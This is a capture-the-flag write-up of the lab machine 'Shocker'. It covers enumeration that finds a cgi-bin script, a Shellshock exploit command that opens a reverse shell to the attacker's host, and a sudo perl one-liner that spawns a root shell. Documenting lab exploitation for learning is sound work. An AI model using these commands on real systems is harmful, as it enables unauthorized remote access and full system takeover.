# SHOCKER | 10.10.10.56

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial $IP

### Open Ports and Their Services

* 80 - HTTP - Apache 2.4.18 - Ubuntu
* 2222 - SSH OpenSSH 7.2p2 Ubuntu

### OS Discovery

Looks like it could be some sort of Ubuntu system...

## Service Enumeration

### 80 - HTTP

Going to the page shows a weird graphic of some creature wielding a hammer or something:

![](img/port-80.png)

I ran a nikto scan but didn't get much in the way of info. So I tried using [dirsearch](https://github.com/maurosoria/dirsearch), which is a python-based directory search tool.

On the first scan on the root address I got an interesting result:

![](img/cgi-bin.png)

So I did another search, adding the 'cgi-bin' directory to the query, and also learning that I should add the 'sh' extension because the cgi-bin directory can be used to run executables via the 'mod_cgi' module.

![](img/user-sh.png)

I downloaded the script and found it was a simple uptime test script. At this point I'm not sure what I can do with this.

![](img/script.png)

Honestly I wasn't getting anywhere but since the name of the box is a giveaway I did a searchsploit query for 'shellshock' and that helped me quite a bit:

![](img/searchsploit.png)

The 'Apache mod_cgi' python exploit looks like exactly what I need. I have copied that to my working directory for later use.

### 2222 - SSH

This is a typical version of SSH. It will require credentials in order to be of any use.

## Exploitation

### Shellshock

The [Shellshock](https://blog.cloudflare.com/inside-shellshock/) bug made quite a stink when it was discovered, because of the ubiquity of the bash shell and it's simplicity to exploit.

Before running the exploit, I wanted to confirm that the target was indeed vulnerable, so I found a shellshock scanner from [here](https://github.com/0xICF/ShellScan), and ran it against the target.

    ./ShellScan.py config/host.txt config/cgi.txt

I ended up getting a positive result, so that is great:

![](img/result.png)

Taking a look at the exploit I grabbed from searchsploit I see that I need to add a few arguments in order to get a reverse shell. The script is very helpful indeed.

    python shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.36 lport=6969 pages=/cgi-bin/user.sh 

The exploit worked! I have a weird reverse shell connection, one in which I did not even need to start my own listener? Neat.

![](img/user-shell.png)

Since I am the user shelly, I can navigate to their home directory and grab the user flag:

![](img/user-flag.png)

## User Enumeration

The first thing I did after grabbing that flag was run `sudo -l` to see if shelly could run anything as root without having to supply a password, and I got this:

![](img/sudo-l.png)

So this should be a simple privesc.

## Privilege Escalation

My user can run /usr/bin/perl as root, without having to supply credentials. So the first thing you should do in this situation is check [GTFObins](https://gtfobins.github.io/gtfobins/perl/) to see if this can be leveraged.

As you can see, I can just run perl, and then execute a privileged shell:

    sudo /usr/bin/perl -e 'exec "/bin/bash";'

Check it out. So simple.

![](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

I had heard of the Shellshock vuln back when it occurred, but I wasn't too into cybersec at the time (I may have only just started with Linux at that point) so I didn't pay it much mind. So I had to read up on it a bit to kind of understand when to look for it in the wild. So with this box I have learned that it is a good idea to test for that vuln if there is a cgi-bin folder with a vulnerable script accessible.

Steps taken:

* Scan site until cgi-bin directory found
* Scan cgi-bin dir until an accessible script is discovered
* Test script with a Shellshock vuln scanner
* Exploit Shellshock vuln to gain a reverse shell
* Escalate to root via user being allowed to run Perl as root
